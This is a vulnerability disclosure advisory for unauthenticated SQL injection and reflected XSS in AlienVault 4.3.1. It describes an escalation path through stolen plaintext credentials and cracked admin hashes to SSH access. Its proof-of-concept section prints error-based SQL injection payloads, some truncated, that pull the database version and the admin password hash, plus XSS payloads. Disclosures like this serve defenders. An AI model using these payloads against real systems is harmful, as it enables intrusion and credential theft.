AlienVault 4.3.1 - Unauthenticated SQL Injection

AlienVault 4.3.1

AlienVault 4.3.1 Unauthenticated SQL Injection
Vulnerability Type: SQL Injection
Reporter: Sasha Zivojinovic
Company: Gotham Digital Science
Affected Software: AlienVault 4.3.1

Severity: Critical


A number of SQL injection vectors were identified within AlienVault (AV) 4.3.1 components. The Geolocation Graph and Radar Access Control AV components were found to accept HTTP request parameters that are concatenated without filtering or validation. These parameters are then passed as SQL queries which exposes the application to SQL Injection. This issue can be exploited by any unauthenticated users who have access to the AV web application. In addition the effective MySQL user was found to be root which allows attackers to leverage the identified issues into attacks against the AV host system.

Technical Details

The date_from and date_to parameters passed to the graph_geoloc.php page, the date_from and date_to parameters passed to the radar-iso27001-A11AccessControl-pot.php page and the user parameter passed to the graph_geoloc2.php page are vulnerable to SQL injection attacks. These parameters were found to evaluate any SQL statements passed to them via a HTTP GET request.

PHP functions whereYM and getSourceLocalSSIYear in source file /var/www/geoloc/include/ do not filter or validate user supplied input when constructing dynamic SQL queries. Attackers can inject arbitrary SQL statements that will be evaluated on the underlying MySQL server.

Due to time limitations it has not been possible to locate the causes of the other identified vectors.

Extending the attack:

An attacker can retrieve various AV credentials including the MySQL connection string by querying the alienvault.config database table or by querying the /etc/ossim/idm/config.xml file through MySQL file access methods such as LOAD_FILE. Almost all credentials used by AV are equivalent so retrieving the credentials for the nessus user will also reveal the credentials for the SQL server and other components. These credentials are stored in plain-text within the database. By querying the alienvault.users table the attacker can retrieve the unsalted MD5 password hashes for administrative users. These hashed credentials are equivalent to the SSH credentials for the same users. Once these credentials have been retrieved and cracked an attacker can bypass the restrictions present in the SQL injection vector and perform arbitrary system or SQL queries by connecting directly to the AV host via SSH and using the local MySQL client to connect to the MySQL server.

Cross Site Scripting (XSS):

In addition the presence of MySQL errors presents an opportunity for reflected XSS attacks as the MySQL server does not filter responses when returning errors to the application user.

Proof-of-Concept Exploit
The integer value passed as a parameter to the SLEEP function can be increased or decreased to validate this finding.

Error based evaluation can be used to return the MySQL version as per the following examples:,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,(1)and(select+1+from(select+count(*),concat((select+@@version),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a);%20-*),concat((select+@@version),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a),2%20-&date_to=2013-07-30*),concat((select+@@version),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a),2%20-*),concat((select+@@version),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a),2%20-*),concat((select+@@version),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a),2%20-&date_to=2*),concat((concat(0x3c7363726970743e616c6572742822,database%20version:,@@version,0x22293c2f7363726970743e)),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a),2%20-&date_to=2

Duplicate entry 5.5.29-29.41 for key group_key
Pulling admin user password hashes:*),concat((select pass from alienvault.users where login=admin),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a),2%20-&date_to=2

Cross Site Scripting:

The following examples demonstrate the use of unfiltered MySQL errors as an XSS vector:

Vanilla XSS<script>alert(GDS)</script>,2%20%20-&date_to=2013-07-30
ASCII Encoded XSS Variant (useful in bypassing application layer filters),2%20%20-&date_to=2013-07-30


AlienVault deployments should be upgraded to the latest stable version. The issues documented in this disclosure have been remediated in AlienVault 4.3.2.